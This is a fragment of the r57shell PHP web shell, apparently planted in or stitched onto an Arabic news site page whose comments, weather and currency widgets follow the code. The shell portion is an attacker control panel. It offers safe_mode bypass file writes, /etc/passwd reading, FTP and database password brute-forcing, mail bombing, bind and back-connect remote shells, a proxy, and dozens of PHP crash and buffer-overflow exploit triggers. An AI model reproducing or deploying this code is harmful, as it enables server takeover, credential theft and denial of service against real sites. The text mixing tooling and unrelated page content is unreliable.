sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts; echo sr(15,"".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15')); echo sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts; echo sr(15,"".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); echo $te.''.$table_end1.$fe; } if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0) { echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts; echo ""; echo $te.''.$table_end1; } if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0) { echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts; echo ""; echo $te.''.$table_end1; } if((!@function_exists('ini_get')) || @ini_get('file_uploads')){ echo ""; echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile0',85,'')); echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } if((!@function_exists('ini_get')) || @ini_get('file_uploads')){ echo ""; echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts; echo ""; echo $te.''.$table_end1.$fe; } if($select_downloaders){ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts; echo sr(15,"".$lang[$language.'_text16'].$arrow."",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78,'http://')); echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te.''.$table_end1.$fe; } echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts; echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); $arh = $lang[$language.'_text92']; if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); echo $te.''.$table_end1.$fe; if(@function_exists("ftp_connect")){ echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."".$fs."".$fe.$fs."".$fe.$fs."".$fe.""; } if(@function_exists("mail")){ echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."".$fs."".$fe.$fs."".$fe.$fs."".$fe."

".$ts; echo sr(20,"".$lang[$language.'_text30'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); echo $te." ".$ts; echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe); echo $te."
".$ts; echo sr(20,"".$lang[$language.'_text4'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); echo $te." ".$ts; echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe); echo $te."
".$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile1',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile2',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile3',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile4',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile5',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile6',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile7',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile8',35,'')); echo $te." ".$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile9',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile10',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile11',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile12',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile13',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile14',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile15',35,'')); echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te." ".$ts; echo "
".$lang[$language.'_text94']."
"; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir)); echo sr(25,"",in('radio','brute_method',0,'passwd',1)."".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root")))); echo sr(25,"".$lang[$language.'_text135'].$arrow."",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1'])); echo $te."
".$ts; echo "
".$lang[$language.'_text87']."
"; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir)); echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); echo $te."
".$ts; echo "
".$lang[$language.'_text100']."
"; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir)); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); echo $te."
".$ts; echo "
".$lang[$language.'_text103']."
"; echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); echo sr(25,"".$lang[$language.'_text108'].$arrow."",''); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); echo $te."
".$ts; echo "
".$lang[$language.'_text104']."
"; echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',30,$dir)); echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); echo $te."
".$ts; echo "
".$lang[$language.'_text139']."
"; echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir)); echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); echo sr(25,"".$lang[$language.'_text108'].$arrow."",''); echo sr(25,"Flood".$arrow."",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."Size(kb)".$arrow."".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10))); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); echo $te."

"; } if($mysql_on||$mssql_on||$pg_on||$ora_on||$mysqli_on||$msql_on||$sqlite_on) { $select = '

'; echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."".$fs."

".$ts; echo "

".$lang[$language.'_text134']."

"; echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute')); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); echo sr(25,"",in('radio','brute_method',0,'passwd',1)."".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); echo sr(35,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); echo sr(25,"".$lang[$language.'_text135'].$arrow."",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1'])); echo $te."

".$fe.$fs."

".$ts; echo "

".$lang[$language.'_text40']."

"; echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); echo sr(35,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' . '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); echo $te."

".$fe.$fs."

".$ts; echo "

".$lang[$language.'_text83']."

"; echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select); echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); echo sr(35,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); echo $te."


".in('submit','submit',0,$lang[$language.'_butt1'])."

"; echo "

".$fe.""; } if(!$safe_mode && $unix){ echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."".$fs."

".$ts; echo "

".$lang[$language.'_text9']."

"; echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',10,'11457')); echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',10,'r57')); echo sr(40,"".$lang[$language.'_text20'].$arrow."","

".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); echo $te."

".$fe.$fs."

".$ts; echo "

".$lang[$language.'_text12']."

"; echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457')); echo sr(40,"".$lang[$language.'_text20'].$arrow."","

".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); echo $te."

".$fe.$fs."

".$ts; echo "

".$lang[$language.'_text22']."

"; echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',10,'11457')); echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',10,'irc.dalnet.ru')); echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',10,'6667')); echo sr(40,"".$lang[$language.'_text26'].$arrow."","

".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); echo $te."

".$fe.$fs."

".$ts; echo "

Proxy

"; echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','proxy_port',10,'31337')); echo sr(40,"".$lang[$language.'_text26'].$arrow."","

".in('hidden','dir',0,$dir)); echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); echo $te."

".$fe.""; } echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."

".$ts; echo "

".$lang[$language.'_text141']."

"; echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe); echo $te."".$ts; echo "

".$lang[$language.'_text141']."

"; echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe); echo $te."".$ts; echo "

".$lang[$language.'_text141']."

"; echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe); echo $te."".$ts; echo "

".$lang[$language.'_text141']."

"; echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe); echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe); /*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/ echo $te."

"; echo ''.$table_up3."

o---[ r57shell | version ".$version." | RST | GHC | Antichat.ru Edition | Generation time: ".round(getmicrotime()-starttime,4)." ]---o

"; echo ''; ?>

تعليقات الزوار
اضافة تعليق

الاسم / الاسم المستعار : *

مكان الاقامة :

عنوان التعليق : *

التعليق الكامل :

جميع الاضافات

وصول الطلاب الى بيروت

وصول الطلاب الى بيروت اهلا و سهلا بهم

قريبا ستار اكاديمي 12

قريبا ستار اكاديمي 12

أوباما يهنئ إسرائيل ويعتبرها "حلم أجيال بوطن...

نشر الرئيس الأمريكي باراك أوباما، مساء اليوم الثلاثاء، تهنئة...

عسفيا : مراسم احياء ذكرى الشهداء من ابناء...

بحضور وزيرة العدل "تسيبي ليبني" مندوبة عن حكومة إسرائيل ، أقيم

جميع الاضافات
بئر السبع 29°-19°
رام الله 28°-21°
عكا 27°-21°
يافا 28°-21°
القدس 25°-15°
حيفا 28°-19°
الناصرة 27°-21°
بئر السبع 28°-14°
رام الله 27°-17°
عكا 24°-18°
يافا 23°-18°
القدس 24°-14°
حيفا 25°-17°
الناصرة 24°-18°
دولار امريكي 3.865
جنيه استرليني 6.1867
ين ياباني 4.9366
يورو 4.9744
دولار استرالي 3.9586
دولار كندي 3.9529
كرون دينيماركي 0.6670
جميع الاضافات

وصول الطلاب الى بيروت

وصول الطلاب الى بيروت اهلا و سهلا بهم

جميع الاضافات
ما رايكم بالموقع ؟
نعم
لا
ابدا
نعم
لا
ابدا
نعم
لا
ابدا
فيسبوك
"; echo ""; echo ""; ?>